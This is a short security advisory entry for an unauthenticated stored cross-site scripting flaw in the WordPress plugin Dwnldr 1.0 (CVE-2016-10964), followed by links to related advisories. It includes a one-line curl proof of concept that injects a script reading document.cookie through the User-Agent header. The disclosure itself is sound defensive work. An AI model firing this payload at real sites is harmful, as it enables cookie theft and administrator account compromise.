Lucene search
Rob CarrWPEX-ID:702B4A5A-8D11-4242-B5E7-84AAAFB9C11EHistoryJul 18, 2016 - 12:00 a.m.
Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
2016-07-1800:00:00
Rob Carr
17
0.001 Low
EPSS
Percentile
32.7%
User agent strings are logged when requesting downloads that are processed by dwnldr and displayed back to the admin with no encoding, allowing for scripts to be stored and executed.
curl -A "User-Agent: <script>alert(document.cookie);</script>" -O http://<target>/?attachment_id=<attachment id> Related
wpvulndb
wpvulndb
Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
2016-07-18 00:00:00
nvd
nvd
CVE-2016-10964
2019-09-16 13:15:10
prion
prion
Design/Logic Flaw
2019-09-16 13:15:00
cve
cve
CVE-2016-10964
2019-09-16 13:15:10
cvelist
cvelist
CVE-2016-10964
2019-09-16 12:27:45